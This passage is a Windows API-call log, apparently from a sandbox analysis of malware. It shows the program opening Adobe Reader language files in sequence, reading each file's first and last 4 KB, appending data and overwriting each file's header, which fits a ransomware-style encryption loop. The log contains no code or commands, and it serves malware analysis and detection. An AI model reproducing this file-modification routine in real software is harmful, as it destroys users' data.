lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6ec8 [0099.398] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.398] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.398] ReleaseMutex (hMutex=0x168) returned 1 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_PA.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es_PA.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es_PA.txt", lpUsedDefaultChar=0x0) returned 30 [0099.399] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.400] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5ec8 [0099.400] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.402] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5ec8 [0099.402] WriteFile (in: hFile=0x1d8, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.402] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0099.402] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.403] CloseHandle (hObject=0x1d8) returned 1 [0099.403] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es__traditional.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.404] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.404] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6ec6 [0099.404] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.404] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.404] ReleaseMutex (hMutex=0x168) returned 1 [0099.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es__TRADITIONAL.txt", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0099.404] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.es__TRADITIONAL.txt", cchWideChar=40, lpMultiByteStr=0x1fb3d9c, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.es__TRADITIONAL.txt", lpUsedDefaultChar=0x0) returned 40 [0099.404] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.406] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5ec6 [0099.406] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.407] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5ec6 [0099.407] WriteFile (in: hFile=0x1d8, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.408] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0099.408] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.408] CloseHandle (hObject=0x1d8) returned 1 [0099.408] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.409] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.409] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6f44 [0099.409] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.409] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.409] ReleaseMutex (hMutex=0x168) returned 1 [0099.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fr_FR_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0099.409] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.fr_FR_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.fr_FR_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0099.409] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.411] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5f44 [0099.411] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.412] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5f44 [0099.413] WriteFile (in: hFile=0x1d8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.413] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0099.413] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.413] CloseHandle (hObject=0x1d8) returned 1 [0099.414] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.it_CH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.it_ch.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.414] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.414] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6e8e [0099.414] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.414] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.415] ReleaseMutex (hMutex=0x168) returned 1 [0099.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.it_CH.txt", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0099.415] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.it_CH.txt", cchWideChar=30, lpMultiByteStr=0x1f8fd5c, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.it_CH.txt", lpUsedDefaultChar=0x0) returned 30 [0099.415] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.416] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e8e [0099.416] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0099.417] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5e8e [0099.417] WriteFile (in: hFile=0x1d8, lpBuffer=0x28730b8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x28730b8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0099.418] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0099.418] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0099.418] CloseHandle (hObject=0x1d8) returned 1 [0099.418] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.lt.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.lt.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0099.419] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.419] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6bea [0099.419] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0099.419] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0099.420] ReleaseMutex (hMutex=0x168) returned 1 [0099.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.lt.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0099.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.lt.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.lt.txt", lpUsedDefaultChar=0x0) returned 27 [0099.420] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.549] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5bea [0101.550] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.550] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5bea [0101.550] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.551] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0101.551] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.551] CloseHandle (hObject=0x1d8) returned 1 [0101.552] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.nl_BE_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.nl_be_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0101.553] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0101.553] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6dd6 [0101.553] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0101.553] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.553] ReleaseMutex (hMutex=0x168) returned 1 [0101.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl_BE_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.554] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.nl_BE_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.nl_BE_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0101.554] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.563] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5dd6 [0101.564] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.569] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5dd6 [0101.569] WriteFile (in: hFile=0x1d8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.570] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0101.570] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.570] CloseHandle (hObject=0x1d8) returned 1 [0101.570] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.pt_PT_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.pt_pt_preeuro.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0101.571] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0101.571] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6f50 [0101.571] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0101.571] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.571] ReleaseMutex (hMutex=0x168) returned 1 [0101.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pt_PT_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0101.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.pt_PT_PREEURO.txt", cchWideChar=38, lpMultiByteStr=0x1fa55f4, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DisplayLanguageNames.pt_PT_PREEURO.txt", lpUsedDefaultChar=0x0) returned 38 [0101.571] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.574] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5f50 [0101.574] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0101.576] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5f50 [0101.576] WriteFile (in: hFile=0x1d8, lpBuffer=0x2667a68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2667a68*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0101.577] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0101.577] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0101.577] CloseHandle (hObject=0x1d8) returned 1 [0101.577] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.sl.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.sl.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0101.578] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0101.578] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6ef0 [0101.578] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0101.578] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0101.578] ReleaseMutex (hMutex=0x168) returned 1 [0101.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sl.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0101.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DisplayLanguageNames.sl.txt", cchWideChar=27, lpMultiByteStr=0x1f8fd5c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 